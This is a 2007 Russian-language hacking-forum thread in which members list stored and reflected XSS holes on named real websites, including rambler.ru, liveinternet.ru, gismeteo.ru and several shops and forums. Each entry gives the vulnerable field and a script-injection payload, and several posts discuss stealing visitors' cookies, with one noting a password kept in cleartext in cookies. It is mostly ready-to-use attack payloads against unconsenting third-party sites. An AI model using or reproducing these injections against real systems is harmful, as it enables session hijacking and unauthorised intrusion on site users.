Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    buka.ru
    в камментах к новостям
    ' любезно заменяются на "
     
    _________________________
  2. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    warlog.info

    Заходим в настройки сайта. Уязвимо поле "Название"

    Code:
    <script>alert();</script>
    Теперь при просмотре статистики сайта на главной странице вылезает алерт.
     
    1 person likes this.
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Downloads.ru
    [​IMG]
    Выбираем любой файл....пишем к нему комментарий...
    Все поля уязвимые т.е. мыло, ник и сообщение ...
    Code:
    "><script>alert("xss")</script>
    Пример
     
    #23 banned, 11 Apr 2007
    Last edited: 11 Apr 2007
  4. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    ukrtelecom.ua
    http://lib.kost.dn.ukrtelecom.ua/guestbook.php
     
    1 person likes this.
  5. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    liveinternet.ru

    В дневниках.
    1) Пишем личное сообщение. Уязвимо поле "Заголовок:"

    Code:
    "><script>alert();</script>
    Если пользователь ответит на это сообщение, то велезет алерт.

    2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:"

    Code:
    "><script>alert();</script>
     
    #25 freddi, 13 Apr 2007
    Last edited: 13 Apr 2007
  6. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
  7. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    zip-2002,
    Code:
    http://www.zip-2002.ru/forum/new.php?t=1&cat=3
    В форме сообщения вводим: <script>alert();</script>
     
  8. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Сайт: http://aktiv.kak-ya.ru/
    Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments
    Уязвимое поле: Заголовок
    Code:
     
    "><script>alert("hek \nActive_jaja")</script>
    
    Сайт: http://forum.allsoch.ru/
    Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076
    Уязвимое поле: Ваш ответ.
    Code:
     
    "><script>alert()</script>
    
     
    #28 [dword], 19 Apr 2007
    Last edited: 19 Apr 2007
  9. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    http://www.booka.ru/

    Вставить в поле Поиск

    Code:
    "><script>alert()</script>
    http://www.oplachu.ru/tov226182.html

    Вставить в поле Ваш комментарий

    Code:
    "><script>alert()</script> 
    http://catalog.kgbi.ru/
    http://catalog.designatelie.ru


    Вставить в поле Поиска

    Code:
    "><script>alert()</script>
     
    #29 _GaLs_, 22 Apr 2007
    Last edited: 22 Apr 2007
  10. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Gals, это же пассивная xss.

    Сайт: http://www.photo-cult.com/
    Путь: http://www.photo-cult.com/showpic.php?rate&id=187916
    Уязвимое поле: Коментар

    Code:
    "><script>alert()</script>
    
     
    4 people like this.
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://www.bilandima.ru бррр..противно...

    Дневники>Новая Запись> Адрес фотографии >
    Code:
     http://"><script>alert(/xss/)</script> 
    да ещё там в куках..пасс в открытом виде)
     
    2 people like this.
  12. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    rambler.ru

    В «Планете» -> «Профиль» -> «Контакты»
    Уязвимо поле “ICQ 2” и название аватарки.
    Куки не стыришь, тк ограничение стоит 22 символа(((

    Code:
    <img src=javascript:alert()>
     
    #32 freddi, 24 Apr 2007
    Last edited: 1 May 2007
    3 people like this.
  13. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    http://kemclub.ru/


    При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -
    Code:
    <script>alert()</script>
    ,

    потом заходим
    Code:
    http://kemclub.ru/club.php?p=8&srat=1
    Находим себя, получаем алерт.
     
    1 person likes this.
  14. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    http://ismart.ee/
    Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

    При регистарации (
    Code:
    http://ismart.ee/Books.dll/login?next=index
    )
    уязвимы поля:
    1. E-mail; - вписываем
    Code:
    [email protected]"><script>alert(/xss/)</script>
    2. Ваше имя. - вписаваем
    Code:
    <script>alert(/xss/)</script>
    Далее можно изменить приветствие на
    Code:
    <script>alert(/xss/)</script>
    
    , тоже работает.

    Все заказы просматриваются вручную кстати ;)

    И напоследок пассивная XSS, хотя это и не так интересно :
    Code:
    http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
     
  15. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Xss на сайте ЦСКА

    Сайт http://www.cskabasket.com/


    Постим коммент
    Code:
    <script>alert ();</script>
     
    2 people like this.
  16. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
    Хек или не хек?
     
    6 people like this.
  17. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    forum.xakep.ru

    Запостил сюда тк не понял какой у них тип форума.
    На форуме прицепляем файл тхт с содержанием:
    "><script>alert()</script>
    и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
    на ие не тестил, он у меня глючит).
     
    1 person likes this.
  18. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    на ачате слева ссылка $$$ для web-мастеров
    http://tak.ru/editing.php
    в любом поле нет фильтрации : "><script>alert()</script>
     
    1 person likes this.
  19. 2pick

    2pick Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    117
    Likes Received:
    39
    Reputations:
    2
    http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
     
  20. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    это пасивная
     
    #40 mr.The, 2 May 2007
    Last edited by a moderator: 4 Jun 2007
    1 person likes this.